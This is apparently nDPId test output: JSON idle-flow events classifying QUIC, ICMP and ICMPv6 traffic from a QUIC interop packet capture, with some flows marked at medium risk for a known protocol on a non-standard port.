-00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434743,"flow_last_seen":1603816444721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} -00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434721,"flow_last_seen":1603816444586,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434756,"flow_last_seen":1603816444721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434670,"flow_last_seen":1603816435086,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00854{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816435054,"flow_last_seen":1603816435054,"flow_idle_time":140000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1603816435020,"flow_last_seen":1603816435194,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00861{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434685,"flow_last_seen":1603816434779,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1279,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434784,"flow_last_seen":1603816434822,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434661,"flow_last_seen":1603816434997,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} -00871{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434602,"flow_last_seen":1603816434650,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434585,"flow_last_seen":1603816434765,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434518,"flow_last_seen":1603816434566,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00859{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434535,"flow_last_seen":1603816444528,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00873{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434599,"flow_last_seen":1603816434725,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434764,"flow_last_seen":1603816434897,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434772,"flow_last_seen":1603816434831,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434680,"flow_last_seen":1603816434845,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434670,"flow_last_seen":1603816444524,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00871{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434528,"flow_last_seen":1603816434679,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00864{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434595,"flow_last_seen":1603816435011,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2534,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1603816434609,"flow_last_seen":1603816434806,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1668,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00855{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434569,"flow_last_seen":1603816434601,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434599,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434806,"flow_last_seen":1603816435089,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00873{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434678,"flow_last_seen":1603816434822,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434524,"flow_last_seen":1603816444507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} 